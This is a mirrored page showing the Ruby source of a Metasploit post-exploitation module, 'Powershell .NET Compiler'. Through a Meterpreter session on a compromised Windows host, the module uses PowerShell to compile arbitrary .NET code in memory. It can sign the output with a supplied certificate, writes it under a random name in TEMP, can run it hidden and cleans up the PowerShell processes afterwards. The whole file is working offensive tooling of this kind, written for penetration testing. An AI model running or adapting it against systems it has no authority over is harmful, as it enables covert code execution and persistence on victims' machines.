CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/powershell/build_net_code.rb
Views: 11788
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::Windows::Powershell

10
  include Msf::Exploit::Powershell::DotNet

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Powershell .NET Compiler',

17
        'Description' => %q{

18
          This module will build a .NET source file using powershell. The compiler builds

19
          the executable or library in memory and produces a binary. After compilation the

20
          PowerShell session can also sign the executable if provided a path the

21
          a .pfx formatted certificate. Compiler options and a list of assemblies

22
          required can be configured in the datastore.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => 'RageLtMan <rageltman[at]sempervictus>',

26
        'Platform' => [ 'windows' ],

27
        'SessionTypes' => [ 'meterpreter' ],

28
        'DisclosureDate' => '2012-08-14',

29
        'Compat' => {

30
          'Meterpreter' => {

31
            'Commands' => %w[

32
              stdapi_fs_stat

33
              stdapi_sys_config_getenv

34
              stdapi_sys_config_getsid

35
              stdapi_sys_process_execute

36
            ]

37
          }

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        OptPath.new('SOURCE_FILE', [true, 'Path to source code']),

45
        OptBool.new('RUN_BINARY', [false, 'Execute the generated binary', false]),

46
        OptString.new('ASSEMBLIES', [false, 'Any assemblies outside the defaults', 'mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll' ]),

47
        OptString.new('OUTPUT_TARGET', [false, 'Name and path of the generated binary, default random, omit extension' ]),

48
        OptString.new('COMPILER_OPTS', [false, 'Options to pass to compiler', '/optimize']),

49
        OptString.new('CODE_PROVIDER', [true, 'Code provider to use', 'Microsoft.CSharp.CSharpCodeProvider'])

50
      ], self.class

51
    )

52
    register_advanced_options(

53
      [

54
        OptString.new('NET_CLR_VER', [false, 'Minimum NET CLR version required to compile', '4.0'])

55
      ], self.class

56
    )

57
  end

58


59
  def run

60
    # Make sure we meet the requirements before running the script

61
    unless session.type == 'meterpreter' || have_powershell?

62
      print_error 'Incompatible Environment'

63
      return 0

64
    end

65


66
    # Havent figured this one out yet, but we need a PID owned by a user, can't steal tokens either

67
    if client.sys.config.is_system?

68
      print_error 'Cannot run as system'

69
      return 0

70
    end

71


72
    # End of file marker

73
    eof = Rex::Text.rand_text_alpha(8)

74
    env_suffix = Rex::Text.rand_text_alpha(8)

75
    net_com_opts = {}

76
    net_com_opts[:target] =

77
      datastore['OUTPUT_TARGET'] ||

78
      "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(rand(8..15))}.exe"

79
    net_com_opts[:com_opts] = datastore['COMPILER_OPTS']

80
    net_com_opts[:provider] = datastore['CODE_PROVIDER']

81
    net_com_opts[:assemblies] = datastore['ASSEMBLIES']

82
    net_com_opts[:net_clr] = datastore['NET_CLR_VER']

83
    net_com_opts[:cert] = datastore['CERT_PATH']

84


85
    begin

86
      net_com_opts[:harness] = ::File.read(datastore['SOURCE_FILE'])

87
      script = dot_net_compiler(net_com_opts)

88
      if datastore['Powershell::Post::dry_run']

89
        print_good "Compiler code:\n#{script}"

90
        return

91
      end

92
    rescue StandardError => e

93
      print_error e

94
      return

95
    end

96


97
    vprint_good "Writing to #{net_com_opts[:target]}"

98


99
    # Execute the powershell script

100
    print_status 'Building remote code.'

101
    cmd_out, running_pids, open_channels = execute_script(script, true)

102
    get_ps_output(cmd_out, eof)

103
    vprint_good "Cleaning up #{running_pids.join(', ')}"

104


105
    clean_up(nil, eof, running_pids, open_channels, env_suffix, false)

106


107
    # Check for result

108
    begin

109
      size = session.fs.file.stat(net_com_opts[:target].gsub('\\', '\\\\')).size

110
      print_good "File #{net_com_opts[:target].gsub('\\', '\\\\')} found, #{size}kb"

111
    rescue StandardError

112
      print_error "File #{net_com_opts[:target].gsub('\\', '\\\\')} not found," \

113
                  " NET CLR version #{datastore['NET_CLR_VER']} possibly not available"

114
      return

115
    end

116


117
    # Run the result

118
    if datastore['RUN_BINARY']

119
      cmd_out = session.sys.process.execute(net_com_opts[:target].gsub('\\', '\\\\'),

120
                                            nil, 'Hidden' => true, 'Channelized' => true)

121
      while (out = cmd_out.channel.read)

122
        print_good out

123
      end

124
    end

125


126
    print_good 'Finished!'

127
  end

128
end

129


130